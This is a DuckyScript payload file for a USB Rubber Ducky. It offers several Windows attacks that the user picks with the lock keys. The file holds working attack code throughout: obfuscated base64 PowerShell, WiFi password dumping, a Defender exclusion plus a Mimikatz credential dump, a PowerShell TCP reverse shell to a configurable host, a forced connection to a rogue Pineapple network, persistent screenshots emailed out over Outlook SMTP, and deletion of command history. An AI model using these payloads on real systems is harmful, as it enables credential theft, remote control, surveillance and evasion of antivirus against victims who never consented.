Path: blob/master/payloads/library/general/duckin8or/payload.txt
2968 views
REM #############################################################################1REM # DuckyScript 3.0 #2REM # Title: _ _ _ _ #3REM # duckin8or >(.)__ >(.)__ >(.)__ >(.)__ #4REM # (___/ (___/ (___/ (___/ #5REM # Author: _ _ _ _ #6REM # irrrwin __(.)< __(.)< __(.)< __(.)< #7REM # \___) \___) \___) \___) #8REM # Compatibility: #9REM # Windows #10REM # #11REM # Description: #12REM # Choose one from 3 attack vectors: (s)creen, (u)ser or (n)etwork and #13REM # run a (v)anilla or (h)ardcore version of it with a button press. #14REM # Vanilla attacks are not intrusive and only grab data. Hardcore stuff #15REM # may interfere with the system and change its state to insecure. #16REM # In addition, Help pop-up and ATTACKMODE STORAGE are available. #17REM # #18REM # Usage: #19REM # 0. Insert Rubbing Duck. #20REM # 1. Choose payload by using a combination of |C|aps Lock, |N|um Lock #21REM # and |S|croll Lock as 0(OFF)/1(ON) switches. #22REM # 2. Press button to run the chosen payload. #23REM # 3. After successful execution, lock keys will start blinking. #24REM # 4. Press button again to reset lock keys and go back to menu. #25REM # 5. Enjoy. #26REM # #27REM # Payloads: #28REM # 0) |-|-|-| [HELP] Help. #29REM # 1) |-|-|S| [s][v] Proof of Pwnage pop-up and screenshot grab. #30REM # 2) |-|N|-| [n][v] Network info exfiltration. #31REM # 3) |-|N|S| [u][h] Disable AV and fetch credentials with Mimikatz. #32REM # 4) |C|-|-| [u][v] Open reverse shell with Powershell. #33REM # 5) |C|-|S| [n][h] Connect target to the rogue piƱa network. #34REM # 6) |C|N|-| [s][h] Persistent screenshot exfiltration. #35REM # 7) |C|N|S| [STOR] Storage mode. #36REM # #37REM # Help: #38REM # 0. Insert duckin8or. #39REM # 1. Press the button. #40REM # 2. Pop-up with brief payloads descriptions will appear. #41REM # #42REM # Tips: #43REM # * Start by filling out the >>> SETTINGS >>>>>> part. #44REM # * First letters of the Lock Keys make it easier to remember payloads. #45REM # F.e. to use (s)creen attack in vanilla mode press (S)croll Lock #46REM # only. To use it in hardcore mode, press the other two Lock Keys #47REM # instead. The same logic applies for (n)etwork attack and (N)um #48REM # Lock Key. For the (u)ser attacks, the (C)aps Lock is used. #49REM # * Each payload within the appropriate >> block << may be edited #50REM # or removed without breaking other features. #51REM # * Any serious application requires a properly obfuscated mimikatz bin.#52REM # * Be responsible. #53REM # #54REM # Kudos: #55REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #56REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #57REM # * the-jcksn - "ducky_crab" #58REM # * I am Jakoby - "-RD-PineApple" #59REM # * Hak5 Team #60REM # #61REM # Disclaimer: #62REM # *This program is free software: you can redistribute it and/or modify #63REM # it under the terms of the GNU General Public License as published by #64REM # the Free Software Foundation, either version 3 of the License, or (at #65REM # your option) any later version.* #66REM # #67REM # *You should have received a copy of the GNU General Public License #68REM # along with this program. If not, see http://www.gnu.org/licenses/ * #69REM # #70REM #############################################################################71727374REM >>> SETTINGS >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>75REM ~~~~~~~~~~~~ EDIT BELOW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~7677DEFINE VID VID_D34D78DEFINE PID PID_B33F79DEFINE MAN MAN_Pentest80DEFINE PROD PROD_DUCKY81DEFINE SERIAL SERIAL_300620498283DEFINE CLEANUP FALSE8485DEFINE LHOST 8.8.8.886DEFINE LPORT 6987DEFINE BEACON icanhazip.com8889DEFINE OUTLOOK_USER [email protected]90DEFINE OUTLOOK_PASS Password1!9192DEFINE CRAB_DELAY_SEC 6093DEFINE CRAB_DURATION_MIN 109495DEFINE PINEAPPLE_SSID PineApple9697REM ~~~~~~~~~~~~ EDIT ABOVE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~98REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETTINGS <<<99100101REM >>> SETUP >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>102103EXTENSION PASSIVE_WINDOWS_DETECT104REM VERSION 1.0105REM CONFIGURATION:106DEFINE MAX_WAIT 150107DEFINE CHECK_INTERVAL 20108DEFINE WINDOWS_HOST_REQUEST_COUNT 2109DEFINE NOT_WINDOWS 7110111VAR $MAX_TRIES = MAX_WAIT112WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))113DELAY CHECK_INTERVAL114$MAX_TRIES = ($MAX_TRIES - 1)115END_WHILE116IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN117$_OS = WINDOWS118ELSE119$_OS = NOT_WINDOWS120END_IF121END_EXTENSION122123IF ($_OS == NOT_WINDOWS) THEN124ATTACKMODE STORAGE125WAIT_FOR_BUTTON_PRESS126STOP_PAYLOAD127END_IF128129BUTTON_DEF130DELAY 20131END_BUTTON132133ATTACKMODE HID134DELAY 1000135136FUNCTION RESET_LOCKS()137REM Set all Lock Keys to OFF position.138IF ($_CAPSLOCK_ON == TRUE ) THEN139CAPSLOCK140END_IF141IF ($_SCROLLLOCK_ON == TRUE ) THEN142SCROLLLOCK143END_IF144IF ($_NUMLOCK_ON == TRUE ) THEN145NUMLOCK146END_IF147END_FUNCTION148149RESET_LOCKS()150151REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< SETUP <<<152153154REM >>> PAYLOAD 0 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>155REM | Open pop-up window with the Lock Keys combos cheatsheet.156157FUNCTION PAYLOAD0()158DELAY 500159GUI r160DELAY 500161STRINGLN powershell162DELAY 500163STRING $l = (164STRING 'Choose payload -> Press one -> Press two -> Repeat',165STRING 'P0 [-][-][-] : This window.',166STRING 'P1 [-][-][N] : Network info.',167STRING 'P2 [-][S][-] : Proof of Pwnage.',168STRING 'P3 [-][S][N] : User credentials.',169STRING 'P4 [C][-][-] : Reverse shell.',170STRING 'P5 [C][-][N] : Ducky_crab.',171STRING 'P6 [C][S][-] : Connect2pinapple.',172STRING 'P7 [C][S][N] : Storage.')173ENTER174STRINGLN $l = $l -join "`n- "175STRINGLN powershell -WindowStyle hidden -Command "& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('- $l','~~~ duckin8or cheatsheet ~~~')}"176END_FUNCTION177178REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 0 <<<179180181REM >>> PAYLOAD 1 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>182REM | Open a proof of pwnage warning box and capture the screen. Save loot to REM | the SD card's root directyory183184FUNCTION PAYLOAD1()185ATTACKMODE HID STORAGE186DELAY 5000187188GUI r189DELAY 500190STRINGLN powershell -NoP -NonI -w h191DELAY 500192193STRINGLN powershell.exe -enc JABVACAAPQAgAHcAaABvAGEAbQBpADsAJABtAD0AIgAkAFUAIABpAHMAIABjAG8AbgBzAGkAZABlAHIAZQBkACAAYwBvAG0AcAByAG8AbQBpAHMAZQBkACEAIABUAGgAaQBzACAAaQBuAGMAaQBkAGUAbgB0ACAAdwBpAGwAbAAgAGIAZQAgAHIAZQBwAG8AcgB0AGUAZAAuACIAOwAkAEwAIAA9ACAARwBlAHQALQBEAGEAdABlAA0ACgBbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAIgBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAIgApADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0ALAAiACQATAAgAC0AIABQAHIAbwBvAGYAIABvAGYAIABDAG8AbQBwAHIAbwBtAGkAcwBlACIALAAwACwAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AEkAYwBvAG4AXQA6ADoARQB4AGMAbABhAG0AYQB0AGkAbwBuACkA;exit194DELAY 500195196GUI r197DELAY 500198STRINGLN powershell -NoP -NonI -w h199DELAY 500200201STRINGLN powershell.exe -enc JABZACAAPQAoACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlACkAOwANAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACoAbQAuACoAcwAuAEYAKgBzADsADQAKAEEAZABkAC0AdAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIAAqAG0ALgBEAHIAKgBnADsADQAKACQAUwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAFMAeQBzAHQAZQBtAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBdADoAOgBWAGkAcgB0AHUAYQBsAFMAYwByAGUAZQBuADsADQAKACQAVwAgAD0AIAAkAFMALgBXAGkAZAB0AGgAOwANAAoAJABIACAAPQAgACQAUwAuAEgAZQBpAGcAaAB0ADsADQAKACQARgAgAD0AIAAkAFMALgBMAGUAZgB0ADsADQAKACQAVAAgAD0AIAAkAFMALgBUAG8AcAA7AA0ACgAkAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABXACwAIAAkAEgAOwANAAoAJABHACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4ARwByAGEAcABoAGkAYwBzAF0AOgA6AEYAcgBvAG0ASQBtAGEAZwBlACgAJABCACkAOwANAAoAJABHAC4AQwBvAHAAeQBGAHIAbwBtAFMAYwByAGUAZQBuACgAJABGACwAIAAkAFQALAAgADAALAAgADAALAAgACQAQgAuAFMAaQB6AGUAKQA7AA0ACgAkAEIALgBTAGEAdgBlACgAJABZACsAIgBcAFAAcgBvAG8AZgAuAGIAbQBwACIAKQA7ACQAUgBEACAAPQAgACgAZwB3AG0AaQAgAHcAaQBuADMAMgBfAHYAbwBsAHUAbQBlACAALQBmACAAJwBsAGEAYgBlAGwAPQAnACcARABVAEMASwBZACcAJwAnACkALgBOAGEAbQBlADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0ATwBiAGoAZQBjAHQAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAE4AYQBtAGUAcwBwAGEAYwBlACgAMQA3ACkALgBQAGEAcgBzAGUATgBhAG0AZQAoACQAUgBEACkALgBJAG4AdgBvAGsAZQBWAGUAcgBiACgAJwBFAGoAZQBjAHQAJwApADsARQB4AGkAdAA=;exit202DELAY 2000203WAIT_FOR_STORAGE_INACTIVITY204END_FUNCTION205206REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 1 <<<207208209REM >>> PAYLOAD 2 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>210REM | Exfiltrate network data such as public IP, local IP and WiFi credentials.211REM | Save loot to the SD card's root directyory212213FUNCTION PAYLOAD2()214ATTACKMODE HID STORAGE215DELAY 5000216217GUI r218DELAY 500219STRINGLN Powershell220DELAY 500221222STRINGLN $pubIP=(Invoke-WebRequest icanhazip.com -UseBasicParsing).Content223STRINGLN $networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}224STRINGLN $WiFi = Out-String -InputObject ((netsh wlan show profiles) | Select-String ":(.+)$" | % {$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | % {$pass=$_.Matches.Groups[1].Value.Trim(); $_} | % {[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize) -Width 100225DELAY 100226STRINGLN $RD=((gwmi win32_volume -f 'label=''DUCKY''').Name + 'network.txt')227DELAY 100228STRINGLN ($WiFi + $pubIP + $networks.ipaddress[0]) | Set-Content -Path $RD229DELAY 200230STRINGLN exit231END_FUNCTION232233REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 2 <<<234235236REM >>> PAYLOAD 3 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>237REM | REQUIRES ADMIN PRIVILEGES. Exfiltrate users credentials with Mimikatz.238REM | Beware that Ducky will expose the drive and AV might pick up on any239REM | potential threats. Save loot to the SD card's root directyory240241FUNCTION PAYLOAD3()242ATTACKMODE HID STORAGE243DELAY 5000244245GUI r246DELAY 500247STRING powershell248DELAY 500249CTRL-SHIFT ENTER250DELAY 500251LEFT252ENTER253DELAY 500254255STRINGLN $RD = (gwmi win32_volume -f 'label=''DUCKY''').Name256DELAY 100257STRINGLN Import-Module Defender258DELAY 200259STRINGLN Set-MpPreference -ExclusionPath $RD260DELAY 100261STRINGLN cd $RD262DELAY 100263STRINGLN .\mk.exe > $env:UserName`.txt -and type $env:UserName`.txt264DELAY 1500265STRINGLN privilege::debug266DELAY 200267STRINGLN sekurlsa::logonPasswords full268DELAY 666269STRINGLN exit270DELAY 100271STRINGLN Remove-MpPreference -ExclusionPath $RD272DELAY 100273STRINGLN exit274END_FUNCTION275276REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 3 <<<277278279REM >>> PAYLOAD 4 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>280REM | Open a simple TCP reverse shell through a powershell session.281282FUNCTION PAYLOAD4()283DELAY 500284GUI r285DELAY 500286STRINGLN powershell -NoP -NonI -w h287DELAY 500288289STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("290STRING LHOST291STRING ",292STRING LPORT293STRING );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit294ENTER295END_FUNCTION296297REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 4 <<<298299300REM >>> PAYLOAD 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>301REM | Prepare an XML file with rogue Pineapple credentials and connect to it.302303FUNCTION PAYLOAD5()304DELAY 500305GUI r306DELAY 500307STRINGLN powershell308DELAY 500309310STRING $f="Home.xml";311STRING $SSID="312STRING PINEAPPLE_SSID313STRING ";314STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'';315STRING $xmlfile="<?xml version=""1.0""?><WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1""><name>$SSID</name><SSIDConfig><SSID><hex>$SSIDHEX</hex><name>$SSID</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><MSM><security><authEncryption><authentication>open</authentication><encryption>none</encryption><useOneX>false</useOneX></authEncryption></security></MSM></WLANProfile>";$XMLFILE > ($f);netsh wlan add profile filename="$($f)";netsh wlan connect name=$SSID;exit316ENTER317END_FUNCTION318319REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 5 <<<320321322REM >>> PAYLOAD 6 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>323REM | Gives "screen crab" like capabilities to the USB rubber ducky. Creates a324REM | powershell script that captures screenshots and exfiltrates them via outlook,325REM | even after the USB rubber ducky has been removed.326327FUNCTION PAYLOAD6()328DELAY 500329GUI r330DELAY 500331STRINGLN powershell332DELAY 200333STRINGLN Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser334DELAY 200335336STRINGLN New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file337DELAY 200338339STRINGLN "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append340DELAY 200341342STRING "`$t = new-timespan -Minutes343STRING CRAB_DURATION_MIN344STRING " | Out-File Pictures\screens.ps1 -Append345ENTER346DELAY 200347348STRINGLN "`$clk = [diagnostics.stopwatch]::StartNew() `nwhile (`$clk.elapsed -lt `$t){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$S = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$S.Width `n`$Height = `$S.Height `n`$Left = `$S.Left `n`$Top = `$S.top `n`$bmp = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$g = [System.Drawing.Graphics]::FromImage(`$bmp) `n`$g.CopyFromScreen(`$Left, `$Top, 0, 0, `$bmp.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$fn = `$enddate + '.gif' `n`$bmp.Save('C:\Users\$env:Username\Pictures\Screens\' + `$fn) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append349DELAY 200350351STRING "Send-MailMessage -From352STRING OUTLOOK_USER353STRING -To354STRING OUTLOOK_USER355STRING -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$fn`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList356STRING OUTLOOK_USER357STRING , (ConvertTo-SecureString -String `"358STRING OUTLOOK_PASS359STRING `" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append360ENTER361DELAY 200362363STRING "start-sleep -seconds364STRING CRAB_DELAY_SEC365STRING `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nexit" | Out-File Pictures\screens.ps1 -Append366ENTER367DELAY 200368STRINGLN exit369DELAY 300370371REM Run the prepared script.372GUI r373DELAY 500374STRINGLN powershell -w h -File "%USERPROFILE%\Pictures\screens.ps1"375DELAY 1000376END_FUNCTION377378REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 6 <<<379380381REM >>> PAYLOAD 7 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>382REM | Storage mode. Press button to stop sharing.383384FUNCTION PAYLOAD7()385ATTACKMODE STORAGE386DELAY 5000387WAIT_FOR_BUTTON_PRESS388$_BUTTON_PUSH_RECEIVED = FALSE389END_FUNCTION390391REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< PAYLOAD 7 <<<392393394REM >>> MAIN >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>395REM | Constantly monitor Scroll Lock, Num Lock, and Caps Lock keys with a while396REM | loop and run appropriate payload when the button is pressed. All Lock keys397REM | will blink when finished. Press again to go back to menu.398399WHILE (TRUE)400IF ($_BUTTON_PUSH_RECEIVED == TRUE ) THEN401DELAY 100402$_BUTTON_PUSH_RECEIVED = FALSE403DISABLE_BUTTON404SAVE_ATTACKMODE405406IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN407RESET_LOCKS()408PAYLOAD0()409ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN410RESET_LOCKS()411PAYLOAD1()412ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN413RESET_LOCKS()414PAYLOAD2()415ELSE IF (($_CAPSLOCK_ON == FALSE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN416RESET_LOCKS()417PAYLOAD3()418ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE))) THEN419RESET_LOCKS()420PAYLOAD4()421ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == TRUE))) THEN422RESET_LOCKS()423PAYLOAD5()424ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE))) THEN425RESET_LOCKS()426PAYLOAD6()427ELSE IF (($_CAPSLOCK_ON == TRUE) && (($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == TRUE))) THEN428RESET_LOCKS()429PAYLOAD7()430END_IF431432RESTORE_ATTACKMODE433DELAY 1000434435IF (CLEANUP == TRUE) THEN436GUI r437DELAY 500438STRINGLN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"; Remove-Item (Get-PSreadlineOption).HistorySavePath439END_IF440441ENABLE_BUTTON442RESET_LOCKS()443$_BUTTON_PUSH_RECEIVED = FALSE444DELAY 100445WHILE ($_BUTTON_PUSH_RECEIVED == FALSE )446DELAY 100447CAPSLOCK448SCROLLLOCK449NUMLOCK450DELAY 100451CAPSLOCK452SCROLLLOCK453NUMLOCK454END_WHILE455$_BUTTON_PUSH_RECEIVED = FALSE456DELAY 100457RESET_LOCKS()458DELAY 100459END_IF460END_WHILE461462REM <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< MAIN <<<463464465